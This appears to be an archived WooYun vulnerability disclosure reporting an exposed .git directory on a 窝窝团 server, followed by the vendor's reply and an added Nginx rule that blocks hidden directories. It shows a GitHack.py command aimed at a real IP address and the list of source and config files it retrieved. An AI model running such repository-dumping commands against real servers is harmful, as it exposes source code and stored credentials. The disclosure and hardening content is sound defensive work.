
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0123363

Title: Sensitive information disclosure in a 窝窝团 (Wowo Tuan) service (program source code readable)

Vendor: 窝窝团

Author: 啊L川

Submitted: 2015-06-29 13:39

Fixed: 2015-08-13 17:30

Published: 2015-08-13 17:30

Type: Sensitive information disclosure

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-06-29: Details sent to the vendor; awaiting the vendor's response
2015-06-29: Vendor confirmed the issue; details disclosed to the vendor only
2015-07-09: Details disclosed to core white hats and domain experts
2015-07-19: Details disclosed to regular white hats
2015-07-29: Details disclosed to intern white hats
2015-08-13: Details disclosed to the public

Brief description:

See title.

Detailed description:

An exposed Git repository on the web server leaks sensitive information and allows the source code to be downloaded.

http://116.213.178.99/.git/config


python GitHack.py http://116.213.178.99/.git/
[+] Download and parse index file ...
[OK] adminjeehe/bd_auditing_refundment.php
[OK] adminjeehe/includes/RefundDeal.class.php
[OK] adminjeehe/includes/RefundGoods.class.php
[OK] adminjeehe/includes/RefundApply.class.php
[OK] adminjeehe/includes/RefundTransfer.class.php
[OK] adminjeehe/includes/Refundment.class.php
[OK] adminjeehe/order.php
[OK] adminjeehe/refundment.php
[OK] adminjeehe/refundment_api.php
[OK] adminjeehe/templates/order_trade_list.htm
[OK] adminjeehe/third_refund_list.php
[OK] data/config.php
[OK] data/development.php
[OK] data/hotfix.php
[OK] data/liantiao.php
[OK] data/special.php
[OK] data/production.php
[OK] data/release.php


Now let's look at config.php:

[Screenshot: QQ20150628-12@2x.png]

[Screenshot: QQ20150628-13@2x.png]

Proof of vulnerability:

[Screenshot: QQ20150628-15@2x.png]


Suggested fix:

Copyright notice: when reposting, please credit the source, 啊L川@乌云 (WooYun).


Vulnerability response

Vendor response:

Severity: Medium

Rank: 7

Confirmed: 2015-06-29 17:28

Vendor reply:

The .svn/.git hidden-directory problem is one that gets made again and again, and different technical teams repeat the same mistake years apart. First, we have to rely on the automated release process to filter out such hidden directories; second, we still have to rely on a unified Nginx configuration to block web access to them. Many thanks to this fellow for helping us find this vulnerability in a non-production environment!
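The second measure the vendor names, a uniform Nginx rule that refuses web access to hidden directories, is shown below as an added example configuration. It is not the vendor's or WooYun's own configuration; the server_name and root values are assumed placeholders.

```nginx
server {
    listen 80;
    server_name example.internal;   # assumed placeholder, not the vendor's host
    root /var/www/app;              # assumed placeholder document root

    # Keep /.well-known/ reachable (ACME challenges, security.txt).
    # The ^~ prefix match takes precedence over the regex location below.
    location ^~ /.well-known/ {
        try_files $uri =404;
    }

    # Refuse any request whose path contains a component starting with a dot:
    # /.git/, /.svn/, /.env, /.htaccess and so on. Returning 404 instead of 403
    # does not confirm to the client that the directory exists. Requests still
    # reach the access log, so probes for /.git/config remain visible to monitoring.
    location ~ /\. {
        return 404;
    }

    location / {
        try_files $uri $uri/ =404;
    }
}
```

After `nginx -t` and a reload, a request such as `curl -sI http://example.internal/.git/config` should answer 404 regardless of whether a repository is present on disk. This only closes the web layer; the vendor's first measure, keeping .git and .svn out of what is released at all (for example, deploying from `git archive` output rather than a working clone), is what actually removes the data from the server.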

Latest status:

None